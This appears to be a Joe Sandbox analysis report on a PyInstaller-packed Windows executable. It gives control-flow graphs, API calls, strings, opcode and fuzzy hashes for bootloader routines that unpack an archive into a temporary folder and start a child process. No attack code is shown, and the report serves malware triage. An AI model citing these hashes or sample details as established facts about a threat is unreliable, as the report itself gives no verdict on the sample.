7ff6fb1e6780 call 7ff6fb1e6510 call 7ff6fb1e7ec0 142->152 147->137 151->152 162 7ff6fb1e39e6-7ff6fb1e39e8 152->162 163 7ff6fb1e39ea-7ff6fb1e3a00 call 7ff6fb1e81f0 call 7ff6fb1e7ec0 162->163 164 7ff6fb1e3a3d-7ff6fb1e3a4b call 7ff6fb1e18a0 162->164 163->164 171 7ff6fb1e3a02-7ff6fb1e3a10 163->171 164->108 172 7ff6fb1e3a12-7ff6fb1e3a2c call 7ff6fb1e25f0 call 7ff6fb1e18a0 171->172 173 7ff6fb1e3a31-7ff6fb1e3a38 call 7ff6fb1e2870 171->173 172->108 173->164
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: FileModuleName
                                                              • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback
                                                              • API String ID: 514040917-1099759049
                                                              • Opcode ID: c0b2594e386a0b9d0a179b47a069e5e77d49092aa87a245718b77c1e1c92fd5a
                                                              • Instruction ID: 4351c9cd71c9236011f0d0ad4ca458a0147431b02101637dfaa68685ba63fe4e
                                                              • Opcode Fuzzy Hash: c0b2594e386a0b9d0a179b47a069e5e77d49092aa87a245718b77c1e1c92fd5a
                                                              • Instruction Fuzzy Hash: 37F14D61E0868391FB19EB21E5652FD6261AF5D788F844031DA6DC3AE6FF2CF568C340
                                                              Function 00007FF6FB205C74 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 335 7ff6fb205c74-7ff6fb205ce7 call 7ff6fb2059a8 338 7ff6fb205d01-7ff6fb205d0b call 7ff6fb1f7830 335->338 339 7ff6fb205ce9-7ff6fb205cf2 call 7ff6fb1f43d4 335->339 344 7ff6fb205d0d-7ff6fb205d24 call 7ff6fb1f43d4 call 7ff6fb1f43f4 338->344 345 7ff6fb205d26-7ff6fb205d8f CreateFileW 338->345 346 7ff6fb205cf5-7ff6fb205cfc call 7ff6fb1f43f4 339->346 344->346 348 7ff6fb205d91-7ff6fb205d97 345->348 349 7ff6fb205e0c-7ff6fb205e17 GetFileType 345->349 357 7ff6fb206042-7ff6fb206062 346->357 355 7ff6fb205dd9-7ff6fb205e07 GetLastError call 7ff6fb1f4368 348->355 356 7ff6fb205d99-7ff6fb205d9d 348->356 352 7ff6fb205e6a-7ff6fb205e71 349->352 353 7ff6fb205e19-7ff6fb205e54 GetLastError call 7ff6fb1f4368 CloseHandle 349->353 360 7ff6fb205e73-7ff6fb205e77 352->360 361 7ff6fb205e79-7ff6fb205e7c 352->361 353->346 369 7ff6fb205e5a-7ff6fb205e65 call 7ff6fb1f43f4 353->369 355->346 356->355 362 7ff6fb205d9f-7ff6fb205dd7 CreateFileW 356->362 366 7ff6fb205e82-7ff6fb205ed7 call 7ff6fb1f7748 360->366 361->366 367 7ff6fb205e7e 361->367 362->349 362->355 374 7ff6fb205ed9-7ff6fb205ee5 call 7ff6fb205bb0 366->374 375 7ff6fb205ef6-7ff6fb205f27 call 7ff6fb205728 366->375 367->366 369->346 374->375 380 7ff6fb205ee7 374->380 381 7ff6fb205f2d-7ff6fb205f6f 375->381 382 7ff6fb205f29-7ff6fb205f2b 375->382 383 7ff6fb205ee9-7ff6fb205ef1 call 7ff6fb1f9dd0 380->383 384 7ff6fb205f91-7ff6fb205f9c 381->384 385 7ff6fb205f71-7ff6fb205f75 381->385 382->383 383->357 388 7ff6fb205fa2-7ff6fb205fa6 384->388 389 7ff6fb206040 384->389 385->384 387 7ff6fb205f77-7ff6fb205f8c 385->387 387->384 388->389 391 7ff6fb205fac-7ff6fb205ff1 CloseHandle CreateFileW 388->391 389->357 392 7ff6fb205ff3-7ff6fb206021 GetLastError call 7ff6fb1f4368 call 7ff6fb1f7970 391->392 393 7ff6fb206026-7ff6fb20603b 391->393 392->393 393->389
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                              • String ID:
                                                              • API String ID: 1617910340-0
                                                              • Opcode ID: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                              • Instruction ID: e2f944a9e83ba7e30b59ec9f2f177da379f5a2a71d054c596229b18e502c4fc3
                                                              • Opcode Fuzzy Hash: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                              • Instruction Fuzzy Hash: 29C19E36B28A4686EB10CF69C5A06BC3761FB59B98B012225DE6ED77E4EF38D551C300
                                                              Function 00007FF6FB1E79B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(?,00007FF6FB1E7EF9,00007FF6FB1E39E6), ref: 00007FF6FB1E7A1B
                                                              • RemoveDirectoryW.KERNEL32(?,00007FF6FB1E7EF9,00007FF6FB1E39E6), ref: 00007FF6FB1E7A9E
                                                              • DeleteFileW.KERNELBASE(?,00007FF6FB1E7EF9,00007FF6FB1E39E6), ref: 00007FF6FB1E7ABD
                                                              • FindNextFileW.KERNELBASE(?,00007FF6FB1E7EF9,00007FF6FB1E39E6), ref: 00007FF6FB1E7ACB
                                                              • FindClose.KERNEL32(?,00007FF6FB1E7EF9,00007FF6FB1E39E6), ref: 00007FF6FB1E7ADC
                                                              • RemoveDirectoryW.KERNELBASE(?,00007FF6FB1E7EF9,00007FF6FB1E39E6), ref: 00007FF6FB1E7AE5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                              • String ID: %s\*
                                                              • API String ID: 1057558799-766152087
                                                              • Opcode ID: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                              • Instruction ID: 260a6123e6ccdfeceeadb3a5763812eba8f680ded8de13b99b7dd316981b334c
                                                              • Opcode Fuzzy Hash: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                              • Instruction Fuzzy Hash: 35411021E0C54395FB30DB24E5585BD6361FB9C798F480632D57EC2AE4EF6CE64A8740
                                                              Function 00007FF6FB1E85A0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Find$CloseFileFirst
                                                              • String ID:
                                                              • API String ID: 2295610775-0
                                                              • Opcode ID: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                              • Instruction ID: 51284713ea7a4f52c2f1898fb99e4ccaf49759f3994e392812a3888dd175179d
                                                              • Opcode Fuzzy Hash: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                              • Instruction Fuzzy Hash: 72F04426A1964386F770CB60B59976A7360AB4C768F041235D97E82AE4EF7CE0598B04
                                                              Function 00007FF6FB1E18F0 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 172COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 179 7ff6fb1e18f0-7ff6fb1e192b call 7ff6fb1e3f70 182 7ff6fb1e1bc1-7ff6fb1e1be5 call 7ff6fb1eb870 179->182 183 7ff6fb1e1931-7ff6fb1e1971 call 7ff6fb1e76a0 179->183 188 7ff6fb1e1bae-7ff6fb1e1bb1 call 7ff6fb1ef36c 183->188 189 7ff6fb1e1977-7ff6fb1e1987 call 7ff6fb1ef9f4 183->189 193 7ff6fb1e1bb6-7ff6fb1e1bbe 188->193 194 7ff6fb1e19a1-7ff6fb1e19bd call 7ff6fb1ef6bc 189->194 195 7ff6fb1e1989-7ff6fb1e199c call 7ff6fb1e2760 189->195 193->182 200 7ff6fb1e19bf-7ff6fb1e19d2 call 7ff6fb1e2760 194->200 201 7ff6fb1e19d7-7ff6fb1e19ec call 7ff6fb1f4154 194->201 195->188 200->188 206 7ff6fb1e19ee-7ff6fb1e1a01 call 7ff6fb1e2760 201->206 207 7ff6fb1e1a06-7ff6fb1e1a87 call 7ff6fb1e1bf0 * 2 call 7ff6fb1ef9f4 201->207 206->188 215 7ff6fb1e1a8c-7ff6fb1e1a9f call 7ff6fb1f4170 207->215 218 7ff6fb1e1aa1-7ff6fb1e1ab4 call 7ff6fb1e2760 215->218 219 7ff6fb1e1ab9-7ff6fb1e1ad2 call 7ff6fb1ef6bc 215->219 218->188 224 7ff6fb1e1ad4-7ff6fb1e1ae7 call 7ff6fb1e2760 219->224 225 7ff6fb1e1aec-7ff6fb1e1b08 call 7ff6fb1ef430 219->225 224->188 230 7ff6fb1e1b1b-7ff6fb1e1b29 225->230 231 7ff6fb1e1b0a-7ff6fb1e1b16 call 7ff6fb1e25f0 225->231 230->188 233 7ff6fb1e1b2f-7ff6fb1e1b3e 230->233 231->188 235 7ff6fb1e1b40-7ff6fb1e1b46 233->235 236 7ff6fb1e1b60-7ff6fb1e1b6f 235->236 237 7ff6fb1e1b48-7ff6fb1e1b55 235->237 236->236 238 7ff6fb1e1b71-7ff6fb1e1b7a 236->238 237->238 239 7ff6fb1e1b8f 238->239 240 7ff6fb1e1b7c-7ff6fb1e1b7f 238->240 242 7ff6fb1e1b91-7ff6fb1e1bac 239->242 240->239 241 7ff6fb1e1b81-7ff6fb1e1b84 240->241 241->239 243 7ff6fb1e1b86-7ff6fb1e1b89 241->243 242->188 242->235 243->239 244 7ff6fb1e1b8b-7ff6fb1e1b8d 243->244 244->242
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _fread_nolock$Message
                                                              • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                              • API String ID: 677216364-3497178890
                                                              • Opcode ID: 493bb61fc539ec1b122e5882e05326b97e853fd3b6a6c00663431bf0fa1fa3e3
                                                              • Instruction ID: 8cd3dbe39fdeabba35f3012ba4dbe3923b299f09861fa7d16d38a881ef22a6a4
                                                              • Opcode Fuzzy Hash: 493bb61fc539ec1b122e5882e05326b97e853fd3b6a6c00663431bf0fa1fa3e3
                                                              • Instruction Fuzzy Hash: D4718F21E1868785FB20DB24E5542FD23A1EB8CB88F445035E9ADC7BE9FE6CF5548B40
                                                              Function 00007FF6FB1E15C0 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 137COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 245 7ff6fb1e15c0-7ff6fb1e15d1 246 7ff6fb1e15d3-7ff6fb1e15dc call 7ff6fb1e1050 245->246 247 7ff6fb1e15f7-7ff6fb1e1611 call 7ff6fb1e3f70 245->247 252 7ff6fb1e15ee-7ff6fb1e15f6 246->252 253 7ff6fb1e15de-7ff6fb1e15e9 call 7ff6fb1e25f0 246->253 254 7ff6fb1e1613-7ff6fb1e163a call 7ff6fb1e2760 247->254 255 7ff6fb1e163b-7ff6fb1e1655 call 7ff6fb1e3f70 247->255 253->252 261 7ff6fb1e1671-7ff6fb1e1688 call 7ff6fb1ef9f4 255->261 262 7ff6fb1e1657-7ff6fb1e166c call 7ff6fb1e25f0 255->262 268 7ff6fb1e16ab-7ff6fb1e16af 261->268 269 7ff6fb1e168a-7ff6fb1e16a6 call 7ff6fb1e2760 261->269 267 7ff6fb1e17c5-7ff6fb1e17c8 call 7ff6fb1ef36c 262->267 275 7ff6fb1e17cd-7ff6fb1e17df 267->275 272 7ff6fb1e16b1-7ff6fb1e16bd call 7ff6fb1e11f0 268->272 273 7ff6fb1e16c9-7ff6fb1e16e9 call 7ff6fb1f4170 268->273 278 7ff6fb1e17bd-7ff6fb1e17c0 call 7ff6fb1ef36c 269->278 279 7ff6fb1e16c2-7ff6fb1e16c4 272->279 282 7ff6fb1e16eb-7ff6fb1e1707 call 7ff6fb1e2760 273->282 283 7ff6fb1e170c-7ff6fb1e1717 273->283 278->267 279->278 290 7ff6fb1e17b3-7ff6fb1e17b8 282->290 284 7ff6fb1e171d-7ff6fb1e1726 283->284 285 7ff6fb1e17a6-7ff6fb1e17ae call 7ff6fb1f415c 283->285 288 7ff6fb1e1730-7ff6fb1e1752 call 7ff6fb1ef6bc 284->288 285->290 294 7ff6fb1e1785-7ff6fb1e178c 288->294 295 7ff6fb1e1754-7ff6fb1e176c call 7ff6fb1efdfc 288->295 290->278 297 7ff6fb1e1793-7ff6fb1e179c call 7ff6fb1e2760 294->297 300 7ff6fb1e1775-7ff6fb1e1783 295->300 301 7ff6fb1e176e-7ff6fb1e1771 295->301 304 7ff6fb1e17a1 297->304 300->297 301->288 303 7ff6fb1e1773 301->303 303->304 304->285
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Message
                                                              • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                              • API String ID: 2030045667-1550345328
                                                              • Opcode ID: 5146ab100ef6ae8108d921daeb6090ca94fb08b852174b9af5e6d18222b17732
                                                              • Instruction ID: f344059fb2ec416c9533b84e2c64572820f65bd2df5aa9520ed281a62e0ad389
                                                              • Opcode Fuzzy Hash: 5146ab100ef6ae8108d921daeb6090ca94fb08b852174b9af5e6d18222b17732
                                                              • Instruction Fuzzy Hash: EC515565E0864392EB20DB25A9605BD22A0BF4DB98F444131EE2EC7AF5FF6CF5648740
                                                              Function 00007FF6FB1E7FC0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 89processsynchronizationCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                              • String ID: CreateProcessW$Failed to create child process!
                                                              • API String ID: 2895956056-699529898
                                                              • Opcode ID: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                              • Instruction ID: e80bbda4e40d2818f9b88610f948c8e1d78189ea65abe69411fbe6e041833de5
                                                              • Opcode Fuzzy Hash: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                              • Instruction Fuzzy Hash: 7541EF35E1878281DB20DB24E4552AEA291FB8D364F540735E6BD877E9EF7CD044CB40
                                                              Function 00007FF6FB1E11F0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 154COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 398 7ff6fb1e11f0-7ff6fb1e124d call 7ff6fb1eb0a0 401 7ff6fb1e124f-7ff6fb1e1276 call 7ff6fb1e25f0 398->401 402 7ff6fb1e1277-7ff6fb1e128f call 7ff6fb1f4170 398->402 407 7ff6fb1e1291-7ff6fb1e12a8 call 7ff6fb1e2760 402->407 408 7ff6fb1e12ad-7ff6fb1e12bd call 7ff6fb1f4170 402->408 413 7ff6fb1e1409-7ff6fb1e141e call 7ff6fb1ead80 call 7ff6fb1f415c * 2 407->413 414 7ff6fb1e12bf-7ff6fb1e12d6 call 7ff6fb1e2760 408->414 415 7ff6fb1e12db-7ff6fb1e12ed 408->415 430 7ff6fb1e1423-7ff6fb1e143d 413->430 414->413 417 7ff6fb1e12f0-7ff6fb1e1315 call 7ff6fb1ef6bc 415->417 424 7ff6fb1e1401 417->424 425 7ff6fb1e131b-7ff6fb1e1325 call 7ff6fb1ef430 417->425 424->413 425->424 431 7ff6fb1e132b-7ff6fb1e1337 425->431 432 7ff6fb1e1340-7ff6fb1e1368 call 7ff6fb1e94e0 431->432 435 7ff6fb1e136a-7ff6fb1e136d 432->435 436 7ff6fb1e13e6-7ff6fb1e13fc call 7ff6fb1e25f0 432->436 437 7ff6fb1e136f-7ff6fb1e1379 435->437 438 7ff6fb1e13e1 435->438 436->424 440 7ff6fb1e13a4-7ff6fb1e13a7 437->440 441 7ff6fb1e137b-7ff6fb1e1389 call 7ff6fb1efdfc 437->441 438->436 443 7ff6fb1e13ba-7ff6fb1e13bf 440->443 444 7ff6fb1e13a9-7ff6fb1e13b7 call 7ff6fb209140 440->444 447 7ff6fb1e138e-7ff6fb1e1391 441->447 443->432 446 7ff6fb1e13c5-7ff6fb1e13c8 443->446 444->443 449 7ff6fb1e13ca-7ff6fb1e13cd 446->449 450 7ff6fb1e13dc-7ff6fb1e13df 446->450 451 7ff6fb1e1393-7ff6fb1e139d call 7ff6fb1ef430 447->451 452 7ff6fb1e139f-7ff6fb1e13a2 447->452 449->436 453 7ff6fb1e13cf-7ff6fb1e13d7 449->453 450->424 451->443 451->452 452->436 453->417
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Message
                                                              • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                              • API String ID: 2030045667-2813020118
                                                              • Opcode ID: 037f3093d73a47c1094b0f469115e0436c81e2300c38a90b229c8b60b32e4b09
                                                              • Instruction ID: f25522d03216c9f26ca48102f9033c5c81c35bf2f67cc895f3b0f9c312f4e899
                                                              • Opcode Fuzzy Hash: 037f3093d73a47c1094b0f469115e0436c81e2300c38a90b229c8b60b32e4b09
                                                              • Instruction Fuzzy Hash: BB519B62E0868381FB60EA16A8503BE6291BB89798F544135ED6EC7BE5FF3CF551C700
                                                              Function 00007FF6FB1FE020 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF6FB1FE3BA,?,?,-00000018,00007FF6FB1FA063,?,?,?,00007FF6FB1F9F5A,?,?,?,00007FF6FB1F524E), ref: 00007FF6FB1FE19C
                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF6FB1FE3BA,?,?,-00000018,00007FF6FB1FA063,?,?,?,00007FF6FB1F9F5A,?,?,?,00007FF6FB1F524E), ref: 00007FF6FB1FE1A8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeLibraryProc
                                                              • String ID: api-ms-$ext-ms-
                                                              • API String ID: 3013587201-537541572
                                                              • Opcode ID: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                              • Instruction ID: f91773464e4e3cebfd30156d09eb2faf33cdbfea43315af6720a273f4a939758
                                                              • Opcode Fuzzy Hash: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                              • Instruction Fuzzy Hash: D241CC22B19A0381EB26CB17A91467A2292BF8DBA8F084535DD2DD77E4FE3DE505C300
                                                              Function 00007FF6FB1E7C40 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 116COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • GetTempPathW.KERNEL32(?,?,FFFFFFFF,00007FF6FB1E3834), ref: 00007FF6FB1E7CE4
                                                              • CreateDirectoryW.KERNELBASE(?,?,FFFFFFFF,00007FF6FB1E3834), ref: 00007FF6FB1E7D2C
                                                                • Part of subcall function 00007FF6FB1E7E10: GetEnvironmentVariableW.KERNEL32(00007FF6FB1E365F), ref: 00007FF6FB1E7E47
                                                                • Part of subcall function 00007FF6FB1E7E10: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6FB1E7E69
                                                                • Part of subcall function 00007FF6FB1F7548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FB1F7561
                                                                • Part of subcall function 00007FF6FB1E26C0: MessageBoxW.USER32 ref: 00007FF6FB1E2736
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Environment$CreateDirectoryExpandMessagePathStringsTempVariable_invalid_parameter_noinfo
